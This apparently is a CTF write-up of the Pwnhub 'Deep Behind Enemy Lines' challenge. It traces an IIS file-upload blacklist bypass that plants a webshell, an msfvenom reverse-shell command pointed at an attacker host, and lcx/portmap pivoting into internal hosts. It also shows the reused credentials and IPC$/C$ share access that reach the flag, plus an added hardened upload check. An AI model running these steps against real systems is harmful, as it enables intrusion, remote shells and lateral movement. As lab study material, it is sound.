Pwnhub 深入敌后 (Deep Behind Enemy Lines) writeup

What a tough journey this was.

[image: pwnhub1]

Looked around the website and found nothing; a port scan turned up nothing either.

Then I used 猪猪侠's dirfuzz to scan for paths and it found the file/.hg path; with https://github.com/kost/dvcs-ripper you can pull down the source code.

[image: pwnhub2]

Next comes a round of code auditing.

The vulnerability is in uploader.php:

<?php
session_start();

// Get the filename and make sure it is valid
$filename = basename($_FILES['file']['name']);

// Get the username and make sure it is valid
$username = $_SESSION['userName'];
if (!preg_match('/^[\w_\-]+$/', $username) ){
    echo "Invalid username";
    header("Refresh: 2; url=files.php");
    exit;
}

if(isset($_POST['submit'])){
    $filename = md5(uniqid(rand()));
    $filename = preg_replace("/[^\w]/i", "", $filename);
    $upfile = $_FILES['file']['name'];
    $upfile = str_replace(';', "", $upfile);
    $tempfile = $_FILES['file']['tmp_name'];
    $ext = trim(get_extension($upfile)); // null
    if(in_array($ext, array('php','php3','php5','php7','phtml'))){
        die('Warning ! File type error..');
    }
    if($ext == 'asp' or $ext == 'asa' or $ext == 'cer' or $ext == 'cdx' or $ext == 'aspx' or $ext == 'htaccess') $ext = 'file';

    $full_path = sprintf("./users_file_system/%s/%s.%s", $username, $filename, $ext);
}

if (move_uploaded_file($_FILES['file']['tmp_name'], $full_path) ){
    header("Location: files.php");
    exit;
} else {
    header("Location: upload_failure.php");
    exit;
}

function get_extension($file){
    return strtolower(substr($file, strrpos($file, '.')+1));
}
?>

At first glance the code looks fine, but while casually browsing the site earlier I had noticed this is a Windows Server + IIS site.

I had run into this upload vulnerability before and even wrote a writeup about it:

http://old.lazysheep.cc/2015/05/19/0x24/

Fuzzing can also bypass this upload filter: aklis.php%fe uploads a PHP file successfully.
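The root cause is that uploader.php trusts a client-controlled extension and compares it against a blacklist, so any extension string that is not literally on the list passes. The following is an added example, not code from the challenge or the writeup's author, showing the hardened shape of the same check: the raw filename must be pure ASCII before it is split, the extension must come from an explicit whitelist, and the stored basename stays server-generated. The function names and the whitelist contents are assumptions.

```php
<?php
// Added example: hardened extension handling for an upload handler.
// Not the challenge's uploader.php; function names and the whitelist are assumptions.

// Only extensions we are willing to store and serve; everything else is rejected.
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'txt', 'pdf'];

/**
 * Return a whitelisted extension for the client-supplied filename, or null.
 *
 * The blacklist in uploader.php fails because the "extension" is whatever
 * follows the last dot, so a name ending in a stray byte such as "\xFE"
 * yields "php\xFE", which is not on the blacklist and passes. Here the
 * whole name must match an ASCII-only pattern before it is even split,
 * and the resulting extension must be a member of the whitelist.
 */
function safe_extension(string $clientName): ?string
{
    // Strip directory components, then reject NUL, non-ASCII and control bytes outright.
    $name = basename($clientName);
    if ($name === '' || !preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,99}\z/D', $name)) {
        return null;
    }
    // Exactly one dot-separated extension, compared case-insensitively.
    $dot = strrpos($name, '.');
    if ($dot === false || $dot === strlen($name) - 1) {
        return null;
    }
    $ext = strtolower(substr($name, $dot + 1));
    return in_array($ext, ALLOWED_EXTENSIONS, true) ? $ext : null;
}

/** Build the destination path from server-generated parts only (hypothetical helper). */
function build_upload_path(string $username, string $ext): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/D', $username)) {
        return null;
    }
    $base = bin2hex(random_bytes(16));  // server-chosen, never derived from the upload
    return sprintf('./users_file_system/%s/%s.%s', $username, $base, $ext);
}

// Constructed sample names, including the bypass string mentioned in the writeup.
foreach (['photo.JPG', 'aklis.php', "aklis.php\xFE", 'a.php.jpg', '..\\x.txt', 'noext'] as $n) {
    $ext = safe_extension($n);
    printf("%-16s -> %s\n", addcslashes($n, "\0..\37\177..\377"), $ext ?? 'rejected');
}
```

Note that the original already generates the basename on the server (md5(uniqid(rand()))); the only attacker-controlled part of the final path is the extension, which is exactly why a whitelist on that one field is enough to close the hole. The ASCII pattern also removes any dependence on how the target filesystem treats unusual bytes in names.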

[image: pwnhub3]

After getting the webshell, I used msf to generate a reverse-shell exe (aklis.exe):

$ msfvenom -p windows/shell_reverse_tcp LHOST=xxxx LPORT=6666 -f exe -o /tmp/reverse.exe

[image: pwnhub4]

Found an internal IP, 172.31.5.95, and connected to it over SSH with Xshell; the user is ubuntu.

For the port forwarding I used the lcx.exe found in dlive's directory; reference:

http://wps2015.org/drops/drops/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%B8%AD%E8%BD%AC%E5%8F%91%E5%B7%A5%E5%85%B7%E6%80%BB%E7%BB%93.html

Command on the Windows box:

C:\inetpub\wwwroot\file\users_file_system\dlive\> lcx.exe -slave xxx 10000 172.31.5.95 22

Command on my xxx machine:

$ ./portmap -m 2 -p1 10000 -p2 12345

portmap is the Linux counterpart of lcx; download: http://www.vuln.cn/2791

Then it is just a matter of connecting over SSH:

$ ssh ubuntu@xxx -p12345
password: abc@elk

The password was learned from a hint:

[image: pwnhub5]

Found a flag in the root directory and thought I had solved it, then learned it was fake. Nearly broke down……

On this Ubuntu server the ubuntu user can sudo and so has root privileges, but the box cannot reach the outside, so installing tools is inconvenient…

Then in /home/ubuntu/.bash_history I found another internal IP: 172.31.13.133

.bash_history also shows that 172.31.13.133 has three ports open: 135, 139 and 445

[image: pwnhub6]

Then came a string of searching for related vulnerabilities, forwarding the corresponding ports out and testing them with msf, all to no avail….

Then I found the IPC$-related commands.

On the Windows box, run:

C:\inetpub\wwwroot\file\users_file_system\aklis>net use \\172.31.13.133\ipc$ "" /user:""
net use \\172.31.13.133\ipc$ "" /user:""
The command completed successfully.

C:\inetpub\wwwroot\file\users_file_system\aklis>net view \\172.31.13.133
net view \\172.31.13.133
System error 5 has occurred.

Access is denied.

But that was no use, so I tried logging in…..

C:\inetpub\wwwroot\file\users_file_system\aklis>net use \\172.31.13.133\ipc$ "abc@ELK" /user:"Administrator"
net use \\172.31.13.133\ipc$ "abc@ELK" /user:"Administrator"
The command completed successfully.

Login succeeded…..

How was the password obtained?

From the hint:

2017.01.15 11:50:00 administrator: Ugh, so annoying, I have to set so many passwords. I'll just be lazy. Damn it, why does Windows have a password policy too.

Then I looked up the Windows password policy:

At least 6 characters long
Contains characters from three of the following four categories:
English uppercase letters (A through Z)
English lowercase letters (a through z)
Base 10 digits (0 through 9)
Non-alphabetic characters (for example: !, $, #, %)
Complexity requirements are enforced when passwords are created or changed

Then one guess was all it took…..

Next:

C:\inetpub\wwwroot\file\users_file_system\aklis>net use d: \\172.31.13.133\c$ "abc@ELK" /user:"Administrator"
net use d: \\172.31.13.133\c$ "abc@ELK" /user:"Administrator"
The command completed successfully.

Then I went into D: and looked for the flag but did not find it; after learning that the flag really is on this machine, I looked up the Windows command for searching files:

D:\>for /r D: %i in (*flag*) do @echo %i
for /r D: %i in (*flag*) do @echo %i
D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\flag.txt
D:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\flag.lnk

Okay…. found the flag:

D:\>cd "Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5"
cd "Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5"

D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5>dir
dir
Volume in drive D has no label.
Volume Serial Number is B2D4-D0F2

Directory of D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5

12/12/2016 02:26 <DIR> .
12/12/2016 02:26 <DIR> ..
12/01/2017 08:35 31 flag.txt
10/06/2009 21:14 7,169 Workflow.Targets
10/06/2009 21:14 8,680 Workflow.VisualBasic.Targets
3 File(s) 15,880 bytes
2 Dir(s) 2,673,094,656 bytes free

D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5>type flag.txt
type flag.txt
pwnhub{flag:y0u f0und my h3art}
